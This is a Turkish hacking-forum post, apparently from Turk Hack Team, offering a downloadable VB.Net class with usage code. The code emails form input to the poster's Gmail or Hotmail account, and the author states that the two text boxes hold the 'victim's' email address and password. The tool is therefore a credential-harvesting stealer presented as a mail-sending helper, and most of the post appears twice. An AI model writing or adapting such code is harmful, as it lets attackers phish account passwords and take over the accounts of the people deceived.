Arkadaşlar Sizlerin Programlarınızı İncelerken Mail Gönderimlerinizin İyi Olmadığını Fark Ettim Vede Bunun Üstüne Bir Class Yazdım Vede Onu Sizlerle Paylaşmak İstiyorum
Buyrun İlk Önce Class ı Vereyim :
Programlama Dili : Vb.Net
>Class İndirmek İçin Tıklayın <
Kullanım
Verdiğim Linkteki Rar I İndirin Daha SOrna Rarın İçindekilerini Çıkarın.Projenizi Açın . Projenize form ekleme Sekmesine Gelin Oradan New İtem Yerine Existing İtem İ Seçin Oradan Rarın İçinden Çıkarttığınız ByMail.vb Adlı Dosyayı seçin Daha sonra
Kullanacağınız Forma Girin Mail gönder Buttonunn Click Eventine Şu Kodları Yazın :
Burada " " İçindeki Yerleri Kendinize Göre Ayarlarsınız
Not : textbox1 Kurbanın Mail adresi textbox2 kurbanın şifresi olucak yani textbox1 ve textbox2 mail gödnerirken gönderilecek olanalr
Mail Gönderiş Resmi :

Buyrun İlk Önce Class ı Vereyim :
Programlama Dili : Vb.Net
>Class İndirmek İçin Tıklayın <
Kullanım
Verdiğim Linkteki Rar I İndirin Daha SOrna Rarın İçindekilerini Çıkarın.Projenizi Açın . Projenize form ekleme Sekmesine Gelin Oradan New İtem Yerine Existing İtem İ Seçin Oradan Rarın İçinden Çıkarttığınız ByMail.vb Adlı Dosyayı seçin Daha sonra
Kullanacağınız Forma Girin Mail gönder Buttonunn Click Eventine Şu Kodları Yazın :
Kod:
[COLOR="RoyalBlue"]Dim[/COLOR] mail [COLOR="RoyalBlue"]As[/COLOR] [COLOR="RoyalBlue"]New[/COLOR] ByMail
mail.Bilgiler([COLOR="RoyalBlue"]True[/COLOR], "[email protected]", "GmailŞifreni")
' ^Burada [COLOR="RoyalBlue"]True[/COLOR] Yazısı Gmail Olarak Çalışır
' Eğer [COLOR="RoyalBlue"]False[/COLOR] Yaparsanız Hotmail Olur
' Yani [COLOR="RoyalBlue"]True[/COLOR]=Gmail
' [COLOR="RoyalBlue"]False[/COLOR]=Hotmail
mail.Hata_Mesajı("Maili Gönderirken bir Hata Oluştu Lütfen Daha Sonra Tekrar Deneyiniz.[COLOR="Red"]"[/COLOR], "Hata Başlığı")
mail.Diğer_Bilgiler("[email protected]", "Mail Başlığı", "Mailin Konusu")
mail.Mail_Gönder([COLOR="Red"]"[/COLOR]<h1>Turk Hack Team-Buraya HTML Kod</h1>[COLOR="Red"]"[/COLOR], TextBox1, TextBox2, [COLOR="RoyalBlue"][COLOR="RoyalBlue"]Me[/COLOR][/COLOR])
Not : textbox1 Kurbanın Mail adresi textbox2 kurbanın şifresi olucak yani textbox1 ve textbox2 mail gödnerirken gönderilecek olanalr
Mail Gönderiş Resmi :
Son düzenleme: